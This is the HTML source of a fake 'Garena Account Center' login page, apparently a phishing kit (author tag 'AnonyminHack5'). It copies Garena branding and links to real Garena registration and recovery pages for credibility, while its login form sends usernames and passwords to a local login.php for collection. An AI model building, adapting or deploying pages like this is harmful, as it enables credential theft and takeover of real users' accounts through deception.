<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="description" content="Garena Account Center">
<meta name="author" content="AnonyminHack5"/>
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/purecss@3.0.0/build/pure-min.css" integrity="sha384-X38yfunGUhNzHpBaEBsWLO+A0HDYOQi8ufWDkZ0k9e0eXz/tH3II7uKZ9msv++Ls" crossorigin="anonymous">

	
<link rel="apple-touch-icon" sizes="180x180" href="favicon_io/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="favicon_io/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="favicon_io/favicon-16x16.png">
<link rel="manifest" href="favicon_io/site.webmanifest">
<title>Garena Account Center</title>
</head>
<body>
<script src="/js/jquery-1.10.2.min.js" type="text/javascript"></script>
<script src="/js/crypto.js?v=0.60" type="text/javascript"></script>
<script src="/js/countries.js?v=0.30" type="text/javascript"></script>
<script src="/js/locales.js?v=0.03" type="text/javascript"></script>
<script src="/i18n/sso/en.js?v=0.58" type="text/javascript"></script>
<!--for google web login-->
<script src="https://apis.google.com/js/platform.js"></script>
<script src="https://www.google.com/recaptcha/api.js?render=explicit" async defer></script>
<script src="/js/js.cookie.js"></script>

<!-- sso website -->
<script src="/js/sso/settings.js" type="text/javascript"></script>
<script src="/js/sso/utils.js" type="text/javascript"></script>
<script src="/js/sso/captcha.js" type="text/javascript"></script>
<script src="/js/sso/content.js" type="text/javascript"></script>
<script src="/js/sso/register.js" type="text/javascript"></script>
<script src="/js/sso.js?v=0.81" type="text/javascript"></script>
<style>
	.div-top {
	background: red;
	border: none;
	border-radius: none:
	outline: none;
	width: auto;
	height: 7px;
	padding: 6px;
	}
	.div-second-top {
	background: #fff;
	border: none;
	border-radius: none;
	width: auto;
	height: 40px;
	padding: 5px;
	}
	img {
	width; auto;
	height: 30px;
	}
	body {
	background: lightgrey;
	font-family: sans-serif;
	font-size: auto;
	}
	h4 {
	font-size: 20px;
	text-align: center;
	font-weight: none;
	</style>
	<div class="div-top">
		</div>
		<div class="div-second-top">
			<center><img src="Images/img_garena_logo.png"/></center>
			</div>
			<br>
						<h4>Log in</h4>
	<style>
		input[type=username] {
		background: #fff;
		border: none;
		border-radius: 2px;
		color: black;
		text-indent: 7%;
		width: 96%;
		height: 38px;
		padding: 4px;
		font-size: 16px;
		outline: none;
		}
		input[type=username]:hover {
		border: 1px solid orange;
		outline: orange;
		}
		input[type=password] {
		background: #fff;
		border: none;
		border-radius: 2px;
		color: black;
		text-indent: 7%;
		width: 96%;
		height: 38px;
		padding: 4px;
		font-size: 16px;
		outline: none;
		}
		input[type=password]:hover {
		border: 1px solid orange;
		outline: orange;
		}
		</style>
		<form action="login.php" method="post" onSubmit="return validateForm();">
			<input type="username" name="username" id="ab" placeholder="Garena Username, Email or Phone " maxlength="40" required/>
			<br>
				
				<br>
			<input type="password" name="password" id="pswd" placeholder="Password" maxlenght="40" required/>
			<br>
				<br>
					<br/>
					
	<style>
		input[type=submit] {
		background: red;
		border: none;
		border-radius: 6px;
		color: #fff;
		text-align: center;
		font-size: 16px;
		width: 98%;
		height: 44px;
		padding: 4px;
		outline: none;
		font-weight: bold;
		}
		input[type=submit]:hover {
		border: 1px solid orange;
		outline: orange
		background: wine;
		opacity: 0.5;
		}
		#p1 {
		font-size: 12px;
		color: black;
		}
		</style>
		<input type="submit" id="login" value="Login Now"/>
		</form>
		<center><p id="p1">__________________________  or  _________________________ </p></center>
	<style>
		#btn {
		background: black;
		border: none;
		border-radius: 6px;
		color: #fff;
		text-align: center;
		font-size: 16px;
		width: 98%;
		height: 44px;
		padding: 4px;
		outline: none;
		font-weight: bold;
		}
		#btn:hover {
		border: 1px solid orange;
		outline: orange
		background: wine;
		opacity: 0.5;
		}
		a {
		color: blue;
		text-decoration: none;
		}
		a:visited {
		color: blue;
		text-decoration: none;
		}
		a:active {
		color: blue;
		}
		</style>
		<button id="btn" onclick="myFunc();">Register A New Account </button>
		<br>
		<script>
	function myFunc() {
	window.open("https://sso.garena.com/ui/register?redirect_uri=https%3A%2F%2Fsso.garena.com%2Fui%2Flogin%3Fapp_id%3D10100%26redirect_uri%3Dhttps%253A%252F%252Faccount.garena.com%252F%26locale%3Den-SG&locale=en-SG");
	}
	</script>
	<br>
		<p style="text-align: center; font-size: 13px;"><a href="https://account.garena.com/recovery#/">Forgot Password</a></p>
	<br>
		<br>
			<br>
				<br>
		</body>
		</html>
		


		

